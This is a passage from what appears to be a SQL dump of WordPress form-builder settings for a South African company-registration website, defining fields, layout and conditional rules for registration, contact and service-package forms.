Names:#**label**#type_textarea#****#3#**id**#custom_3#**label**#type_editor#****#4#**id**#How many Directors in your company:#**label**#type_own_select#****#5#**id**#custom_5#**label**#type_editor#****#6#**id**#Do you have a business address:#**label**#type_radio#****#7#**id**#custom_7#**label**#type_editor#****#9#**id**#custom_9#**label**#type_editor#****#10#**id**#Street Address#**label**#type_address#****#11#**id**#Suburb#**label**#type_address#****#12#**id**#City#**label**#type_address#****#13#**id**#Province#**label**#type_address#****#14#**id**#Postal Code#**label**#type_address#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#Full Name:#**label**#type_name#****#19#**id**#Phone:#**label**#type_phone_new#****#20#**id**#Street Address#**label**#type_address#****#21#**id**#Suburb#**label**#type_address#****#22#**id**#City#**label**#type_address#****#23#**id**#Province#**label**#type_address#****#24#**id**#Postal Code#**label**#type_address#****#27#**id**#custom_27#**label**#type_editor#****#40#**id**#Full Name:(2)#**label**#type_name#****#41#**id**#Phone:(2)#**label**#type_phone_new#****#28#**id**#Street Address#**label**#type_address#****#29#**id**#Suburb#**label**#type_address#****#30#**id**#City#**label**#type_address#****#31#**id**#Province#**label**#type_address#****#32#**id**#Postal Code#**label**#type_address#****#55#**id**#Phone:(4)#**label**#type_phone_new#****#42#**id**#custom_42#**label**#type_editor#****#43#**id**#Full Name:(3)#**label**#type_name#****#44#**id**#Phone:(3)#**label**#type_phone_new#****#45#**id**#Street Address#**label**#type_address#****#46#**id**#Suburb#**label**#type_address#****#47#**id**#City#**label**#type_address#****#48#**id**#Province#**label**#type_address#****#49#**id**#Postal Code#**label**#type_address#****#53#**id**#custom_53#**label**#type_editor#****#54#**id**#Full Name:(4)#**label**#type_name#****#56#**id**#Street Address#**label**#type_address#****#57#**id**#Suburb#**label**#type_address#****#58#**id**#City#**label**#type_address#****#59#**id**#Province#**label**#type_address#****#60#**id**#Postal Code#**label**#type_address#****#62#**id**#custom_62#**label**#type_editor#****#63#**id**#Upload certified Copies of all Director/s IDs/Passports:#**label**#type_file_upload#****#64#**id**#custom_64#**label**#type_editor#****#66#**id**#type_submit_reset_66#**label**#type_submit_reset#****#65#**id**#Was the form easy to complete?:#**label**#type_star_rating#****##**id**##**label**##****#','1#**id**#Insert todays date:#**label**#type_date_new#****#2#**id**#Proposed Company Names:#**label**#type_textarea#****#3#**id**#custom_3#**label**#type_editor#****#4#**id**#How many Directors in your company:#**label**#type_own_select#****#5#**id**#custom_5#**label**#type_editor#****#6#**id**#Do you have a business address:#**label**#type_radio#****#7#**id**#custom_7#**label**#type_editor#****#9#**id**#custom_9#**label**#type_editor#****#10#**id**#Street Address#**label**#type_address#****#11#**id**#Suburb#**label**#type_address#****#12#**id**#City#**label**#type_address#****#13#**id**#Province#**label**#type_address#****#14#**id**#Postal Code#**label**#type_address#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#Full Name:#**label**#type_name#****#19#**id**#Phone:#**label**#type_phone_new#****#20#**id**#Street Address#**label**#type_address#****#21#**id**#Suburb#**label**#type_address#****#22#**id**#City#**label**#type_address#****#23#**id**#Province#**label**#type_address#****#24#**id**#Postal Code#**label**#type_address#****#27#**id**#custom_27#**label**#type_editor#****#40#**id**#Full Name:(2)#**label**#type_name#****#41#**id**#Phone:(2)#**label**#type_phone_new#****#28#**id**#Street Address#**label**#type_address#****#29#**id**#Suburb#**label**#type_address#****#30#**id**#City#**label**#type_address#****#31#**id**#Province#**label**#type_address#****#32#**id**#Postal Code#**label**#type_address#****#55#**id**#Phone:(4)#**label**#type_phone_new#****#42#**id**#custom_42#**label**#type_editor#****#43#**id**#Full Name:(3)#**label**#type_name#****#44#**id**#Phone:(3)#**label**#type_phone_new#****#45#**id**#Street Address#**label**#type_address#****#46#**id**#Suburb#**label**#type_address#****#47#**id**#City#**label**#type_address#****#48#**id**#Province#**label**#type_address#****#49#**id**#Postal Code#**label**#type_address#****#53#**id**#custom_53#**label**#type_editor#****#54#**id**#Full Name:(4)#**label**#type_name#****#56#**id**#Street Address#**label**#type_address#****#57#**id**#Suburb#**label**#type_address#****#58#**id**#City#**label**#type_address#****#59#**id**#Province#**label**#type_address#****#60#**id**#Postal Code#**label**#type_address#****#62#**id**#custom_62#**label**#type_editor#****#63#**id**#Upload certified Copies of all Director/s IDs/Passports:#**label**#type_file_upload#****#64#**id**#custom_64#**label**#type_editor#****#66#**id**#type_submit_reset_66#**label**#type_submit_reset#****#65#**id**#Was the form easy to complete?:#**label**#type_star_rating#****#','0','percentage','false','true','','','',0,'testmode','','USD',0,'1*:*id*:*type_date_new*:*type*:*Insert todays date:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_date*:*yes*:*w_required*:*yes*:*w_show_image*:**:*w_class*:*dd/mm/yy*:*w_format*:*0*:*w_start_day*:**:*w_default_date*:**:*w_min_date*:**:*w_max_date*:**:*w_invalid_dates*:*yes***yes***yes***yes***yes***yes***yes*:*w_show_days*:*yes*:*w_hide_time*:*...*:*w_but_val*:*no*:*w_disable_past_days*:**:*new_field*:*2*:*id*:*type_textarea*:*type*:*Proposed Company Names:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*yes*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_editor*:*type*:*custom_3*:*w_field_label*:*<p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">Provide at least 3-4 names each on a new line. Try different names rather than different variations of the same name. Note if the name is not available this may cause delays in the registration of the company; i.e. until a suitable name is found.</span></p>*:*w_editor*:**:*new_field*:*4*:*id*:*type_own_select*:*type*:*How many Directors in your company:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Select value***One***Two***Three***Four*:*w_choices*:*true***false***false***false***false*:*w_choices_checked*:*true***false***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*no*:*w_value_disabled*:****One***Two***Three***Four*:*w_choices_value*:**************:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*5*:*id*:*type_editor*:*type*:*custom_5*:*w_field_label*:*<p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">If there are more than 4 directors; complete the details for the first 4 directors and email the remaining directors details, as per 2nd director requirements below, to store@companyregistration.online</span></p>*:*w_editor*:**:*new_field*:*6*:*id*:*type_radio*:*type*:*Do you have a business address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*7*:*id*:*type_editor*:*type*:*custom_7*:*w_field_label*:*<p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">If not, select \'No\', the home address of the 1st Director will used as the business address. This can be changed and should be changed once your business has an address.</span></p>*:*w_editor*:**:*new_field*:*8*:*id*:*type_section_break*:*type*:*custom_8*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*9*:*id*:*type_editor*:*type*:*custom_9*:*w_field_label*:*<h3><span style=\"color: rgb(0, 204, 255); font-family: trebuchet ms,geneva,sans-serif;\" data-mce-style=\"color: #00ccff; font-family: trebuchet ms,geneva,sans-serif;\">Business Details</span><br></h3>*:*w_editor*:**:*new_field*:*10*:*id*:*type_address*:*type*:*Physical Address of the business:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*16*:*id*:*type_editor*:*type*:*custom_16*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">Incorporator or 1st Director Details</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*17*:*id*:*type_editor*:*type*:*custom_17*:*w_field_label*:*<p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">The Incoporator is generally the 1st Director</span><br></p>*:*w_editor*:**:*new_field*:*18*:*id*:*type_name*:*type*:*Full Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Surname***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*yes***no*:*w_name_fields*:*yes*:*w_autofill*:**:*new_field*:*19*:*id*:*type_phone_new*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:*za*:*w_top_country*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*20*:*id*:*type_address*:*type*:*Physical home address 1:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*26*:*id*:*type_section_break*:*type*:*custom_26*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*27*:*id*:*type_editor*:*type*:*custom_27*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">2nd Director\'s Details</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*40*:*id*:*type_name*:*type*:*Full Name:(2)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Surname***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*yes***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*41*:*id*:*type_phone_new*:*type*:*Phone:(2)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:*za*:*w_top_country*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*28*:*id*:*type_address*:*type*:*Physical home address 2:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*55*:*id*:*type_phone_new*:*type*:*Phone:(4)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:*za*:*w_top_country*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*42*:*id*:*type_editor*:*type*:*custom_42*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">3rd Director\'s Details</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*43*:*id*:*type_name*:*type*:*Full Name:(3)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Surname***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*yes***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*44*:*id*:*type_phone_new*:*type*:*Phone:(3)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:*za*:*w_top_country*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*45*:*id*:*type_address*:*type*:*Physical home address 3:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*51*:*id*:*type_section_break*:*type*:*custom_51*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*53*:*id*:*type_editor*:*type*:*custom_53*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">4th Director\'s Details</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*54*:*id*:*type_name*:*type*:*Full Name:(4)*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Surname***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*yes***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*56*:*id*:*type_address*:*type*:*Physical home address 4:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Suburb***City***Province***Postal Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*62*:*id*:*type_editor*:*type*:*custom_62*:*w_field_label*:*<h3><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">Almost Done</span><br data-mce-bogus=\"1\"></h3>*:*w_editor*:**:*new_field*:*63*:*id*:*type_file_upload*:*type*:*Upload certified Copies of all Director/s IDs/Passports:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*http://companyregistration.online/wp-content/uploads/form-maker*:*w_destination*:*jpg, jpeg, png, gif, doc, docx, xls, xlsx*:*w_extension*:*2000*:*w_max_size*:*yes*:*w_required*:*yes*:*w_multiple*:**:*w_class*:**:*new_field*:*64*:*id*:*type_editor*:*type*:*custom_64*:*w_field_label*:*<h2><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">Before you submit?</span></h2><p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">Review the details of your submission.</span><br><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\"> Please be patient, after you submit the form, it will take 20-30 seconds to upload</span></p><hr>*:*w_editor*:**:*new_field*:*66*:*id*:*type_submit_reset*:*type*:*type_submit_reset_66*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*65*:*id*:*type_star_rating*:*type*:*Was the form easy to complete?:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yellow*:*w_field_label_col*:*5*:*w_star_amount*:*no*:*w_required*:*wdform_star_rating*:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','1*:*show_hide*:*10*:*field_label*:*and*:*all_any*:*6***==***Yes*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*9*:*field_label*:*and*:*all_any*:*6***==***Yes*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*8*:*field_label*:*and*:*all_any*:*6***==***Yes*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*54*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*55*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*56*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*71*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*53*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*51*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*42*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*43*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*44*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*70*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*45*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*26*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*27*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*40*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Three*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*41*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*69*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*28*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*','','','','','Company Registration Form','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(12,'Contact Us','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\" style=\"\">%3 - Company:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\" style=\"\">%4 - Questions/Comments:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',5,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Company:#**label**#type_text#****#4#**id**#Questions/Comments:#**label**#type_textarea#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Company:#**label**#type_text#****#4#**id**#Questions/Comments:#**label**#type_textarea#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Company:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Questions/Comments:*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Contact us','You may contact us on the form below.','http://companyregistration.online/wp-content/uploads/2016/03/contact-us-1.jpg','tada',0),(14,'Customize package','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Custom Package\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Business%</div><div wdid=\"13\" class=\"wdform_row ui-sortable-handle\">%13 - Tax%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Cloud Applications%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\">%9 - Web Design%</div><div wdid=\"10\" class=\"wdform_row ui-sortable-handle\">%10 - Word Verification:%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\">%11 - type_submit_reset_11%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\">%12 - Services%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',14,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business#**label**#type_checkbox#****#13#**id**#Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#9#**id**#Web Design#**label**#type_checkbox#****#10#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#11#**id**#type_submit_reset_11#**label**#type_submit_reset#****#12#**id**#Services#**label**#type_checkbox#****#7#**id**#Radio:#**label**#type_radio#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#6#**id**#Business#**label**#type_checkbox#****#13#**id**#Tax#**label**#type_checkbox#****#8#**id**#Cloud Applications#**label**#type_checkbox#****#9#**id**#Web Design#**label**#type_checkbox#****#10#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#11#**id**#type_submit_reset_11#**label**#type_submit_reset#****#12#**id**#Services#**label**#type_checkbox#****#','0','none','false','true','','','',0,'testmode','','USD',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Business*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Name reservation***Company registration***BEE Affidavit***Share Certificate***Share register*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Name reservation***Company registration***BEE Affidavit***Share Certificate***Share register*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*13*:*id*:*type_checkbox*:*type*:*Tax*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Tax Clearence***Income Tax Registration***Vat Registration***PAYE Registration*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Tax Clearence***Income Tax Registration***Vat Registration***PAYE Registration*:*w_choices_value*:***********:*w_choices_params*:**:*w_class*:**:*new_field*:*8*:*id*:*type_checkbox*:*type*:*Cloud Applications*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Messages &amp; Appointments***Employee Management***Work &amp; Tasks Management***Online Accounting***Device 